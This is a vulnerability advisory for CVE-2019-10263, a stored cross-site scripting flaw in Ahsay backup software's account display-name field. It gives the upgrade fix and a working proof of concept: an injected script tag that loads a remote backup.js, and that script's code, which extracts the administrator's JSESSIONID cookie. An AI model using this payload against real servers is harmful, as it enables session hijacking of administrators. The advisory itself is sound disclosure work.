CVE-2019-10263 - Stored Cross Site Scripting (XSS) :: WBSec.nl

Advisory

Upgrade to the latest version of Ahsay, currently 8.1.1.50 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)

Technical details

When creating an account the field “Alias/Display name” is vulnerable to a stored XSS, this XSS will be triggerd when a administrator visits the “Users, Groups & Policies” page. This stored XSS can be leveraged to steal the administrators cookie, because the cookie is being reflected in the HTML.

'><script src=https://www.wbsec.nl/ahsay/backup.js></script>

backup.js:

try {
        var scripts = document.getElementsByTagName("script");
        for (var i = 0; i < scripts.length; ++i) {
                js = scripts[i].getAttribute("src").includes("=");
                if (js){
                        //console.debug(scripts[i]);
                        cookie = scripts[i].getAttribute("src").split("=")[1];
                        console.debug(cookie);
                }
        }
} catch (err) {
        
        //console.debug(err);
}
alert(document.URL + ": JSESSIONID=" + cookie);

resulting in grabbing the cookie shown below: Cookie reflected